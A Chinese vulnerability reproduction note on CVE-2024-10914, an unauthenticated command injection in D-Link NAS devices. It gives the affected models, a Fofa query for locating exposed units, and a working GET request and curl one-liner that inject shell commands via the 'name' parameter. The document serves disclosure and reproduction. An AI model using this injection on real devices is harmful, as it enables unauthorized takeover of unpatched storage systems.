D-Link NAS account_mgr.cgi 未授权RCE漏洞复现（CVE-2024-10914）

0x01 产品描述：

 ‌        D-Link NAS‌是一种基于网络的存储解决方案，提供大容量存储空间，并通过网络连接访问和管理数据。它适用于企业，可以作为企业云盘使用，为企业员工提供方便快捷的存储和共享服务‌。
0x02 漏洞描述：

        该漏洞是 `account_mgr.cgi` 脚本中的命令注入漏洞，允许远程攻击者通过特制的 HTTP GET 请求执行任意命令。同时该漏洞特别影响“account_mgr.cgi”脚本的“cgi_user_add”命令中的“name”参数。由于输入过滤不充分，注入“name”参数的恶意命令可能导致未经授权的命令执行。

0x03 影响版本：

DNS-320 – 版本 1.00

DNS-320LW – 版本 1.01.0914.2012

DNS-325 – 版本 1.01 和 1.02

DNS-340L – 版本 1.08

0x04 搜索语句：

Fofa：app="D_Link-DNS-ShareCenter"

0x05 漏洞复现：

poc：

GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;ifconfig;%27 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

curl命令：

Curl "http://your-ip:port/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27"

0x06 修复建议：

D-Link 在安全公告中确认将不提供CVE-2024-10914的补丁，并建议用户弃用易受攻击的产品。

可采用下列方法缓解漏洞影响：对 NAS 管理接口的网络访问应仅限于受信任的 IP 地址。